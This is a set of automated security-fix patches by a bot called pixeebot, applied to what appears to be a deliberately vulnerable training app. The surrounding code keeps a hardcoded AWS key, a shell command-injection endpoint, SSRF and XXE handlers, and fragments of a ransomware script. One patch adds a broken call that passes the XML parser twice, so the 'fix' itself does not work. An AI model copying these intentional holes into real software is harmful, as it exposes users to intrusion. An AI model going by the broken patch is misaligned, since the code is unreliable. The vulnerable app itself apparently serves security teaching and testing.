From 69be8389b24de5653469128c6c402b39b4a381da Mon Sep 17 00:00:00 2001 From: "pixeebot[bot]" <104101892+pixeebot[bot]@users.noreply.github.com> Date: Thu, 19 Dec 2024 20:07:52 +0000 Subject: [PATCH 1/4] Sandbox Process Creation --- insecure-app/app.py | 3 ++- insecure-app/requirements.txt | 3 ++- 2 files changed, 4 insertions(+), 2 deletions(-) diff --git a/insecure-app/app.py b/insecure-app/app.py index 9eee52c..1f419e9 100644 --- a/insecure-app/app.py +++ b/insecure-app/app.py @@ -4,6 +4,7 @@ import sqlite3 import requests from lxml import etree +from security import safe_command # Example hardcoded AWS credentials (sensitive data leakage) aws_access_key_id = 'AKIA2JAPX77RGLB664VE' @@ -28,7 +29,7 @@ def index(): # 2 - Command Injection if 'command' in request.form: cmd = request.form['command'] - process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + process = safe_command.run(subprocess.Popen, cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, stderr = process.communicate() if process.returncode == 0: output = stdout.decode('utf-8') diff --git a/insecure-app/requirements.txt b/insecure-app/requirements.txt index 57fe178..1dfa813 100644 --- a/insecure-app/requirements.txt +++ b/insecure-app/requirements.txt @@ -1,4 +1,5 @@ requests == 2.19.1 cryptography==3.3.2 flask==3.0.2 -#cryptograpy==3.3.2 \ No newline at end of file +#cryptograpy==3.3.2 +security==1.3.1 From 6f3b712d1288498c94508484a3cbe29c9112967d Mon Sep 17 00:00:00 2001 From: "pixeebot[bot]" <104101892+pixeebot[bot]@users.noreply.github.com> Date: Thu, 19 Dec 2024 20:07:53 +0000 Subject: [PATCH 2/4] Sandbox URL Creation --- insecure-api/requirements.txt | 3 ++- insecure-app/app.py | 5 ++--- insecure-app/ransomware.py | 4 ++-- 3 files changed, 6 insertions(+), 6 deletions(-) diff --git a/insecure-api/requirements.txt b/insecure-api/requirements.txt index 40f2a2f..8ec1658 100644 --- a/insecure-api/requirements.txt +++ b/insecure-api/requirements.txt @@ -1,2 +1,3 @@ fastapi==0.115.5 -uvicorn==0.32.1 \ No newline at end of file +uvicorn==0.32.1 +security==1.3.1 diff --git a/insecure-app/app.py b/insecure-app/app.py index 1f419e9..c1800e0 100644 --- a/insecure-app/app.py +++ b/insecure-app/app.py @@ -2,9 +2,8 @@ import subprocess import os import sqlite3 -import requests from lxml import etree -from security import safe_command +from security import safe_requests, safe_command # Example hardcoded AWS credentials (sensitive data leakage) aws_access_key_id = 'AKIA2JAPX77RGLB664VE' @@ -78,7 +77,7 @@ def index(): elif 'url' in request.form: url = request.form['url'] try: - response = requests.get(url, timeout=60) + response = safe_requests.get(url, timeout=60) output = f"SSRF Response: {response.text[:200]}" except Exception as e: output = f"SSRF Error: {e}" diff --git a/insecure-app/ransomware.py b/insecure-app/ransomware.py index 9044dd4..8c7614c 100644 --- a/insecure-app/ransomware.py +++ b/insecure-app/ransomware.py @@ -4,7 +4,6 @@ import webbrowser # to load webbrowser to go to specific website eg bitcoin import ctypes # so we can intereact with windows dlls and change windows background etc import urllib.request # used for downloading and saving background image -import requests # used to make get reqeust to api.ipify.org to get target machine ip addr import time # used to time.sleep interval for ransom note & check desktop to decrypt system/files import datetime # to give time limit on ransom note import subprocess # to create process for notepad and open ransom note @@ -14,6 +13,7 @@ from Crypto.Cipher import AES, PKCS1_OAEP import base64 import threading # used for ransom note and decryption key on dekstop +from security import safe_requests @@ -50,7 +50,7 @@ def __init__(self): self.localRoot = r'D:\Coding\Python\RansomWare\RansomWare_Software\localRoot' # Debugging/Testing # Get public IP of person, for more analysis etc. (Check if you have hit gov, military ip space LOL) - self.publicIP = requests.get('https://api.ipify.org', timeout=60).text + self.publicIP = safe_requests.get('https://api.ipify.org', timeout=60).text # Generates [SYMMETRIC KEY] on victim machine which is used to encrypt the victims data From 40d9299e84a6b7c3c348d1e2ab28952513e7a9c0 Mon Sep 17 00:00:00 2001 From: "pixeebot[bot]" <104101892+pixeebot[bot]@users.noreply.github.com> Date: Thu, 19 Dec 2024 20:07:54 +0000 Subject: [PATCH 3/4] Use Safe Defaults for `lxml` Parsers --- insecure-app/app.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/insecure-app/app.py b/insecure-app/app.py index c1800e0..8b46da3 100644 --- a/insecure-app/app.py +++ b/insecure-app/app.py @@ -67,7 +67,7 @@ def index(): xml_data = request.form['xml'] try: # Use lxml to parse the XML data - parser = etree.XMLParser(load_dtd=True, resolve_entities=True) + parser = etree.XMLParser(load_dtd=True, resolve_entities=False) tree = etree.fromstring(xml_data.encode(), parser) output = f"Parsed XML: {etree.tostring(tree, encoding='unicode')}" except Exception as e: From 2e95556836a496783390412608b5599e426af07d Mon Sep 17 00:00:00 2001 From: "pixeebot[bot]" <104101892+pixeebot[bot]@users.noreply.github.com> Date: Thu, 19 Dec 2024 20:07:55 +0000 Subject: [PATCH 4/4] Use Safe Parsers in `lxml` Parsing Functions --- insecure-app/app.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/insecure-app/app.py b/insecure-app/app.py index 8b46da3..938f431 100644 --- a/insecure-app/app.py +++ b/insecure-app/app.py @@ -4,6 +4,7 @@ import sqlite3 from lxml import etree from security import safe_requests, safe_command +import lxml.etree # Example hardcoded AWS credentials (sensitive data leakage) aws_access_key_id = 'AKIA2JAPX77RGLB664VE' @@ -68,7 +69,7 @@ def index(): try: # Use lxml to parse the XML data parser = etree.XMLParser(load_dtd=True, resolve_entities=False) - tree = etree.fromstring(xml_data.encode(), parser) + tree = etree.fromstring(xml_data.encode(), parser, parser=lxml.etree.XMLParser(resolve_entities=False)) output = f"Parsed XML: {etree.tostring(tree, encoding='unicode')}" except Exception as e: output = f"XML Parsing Error: {e}"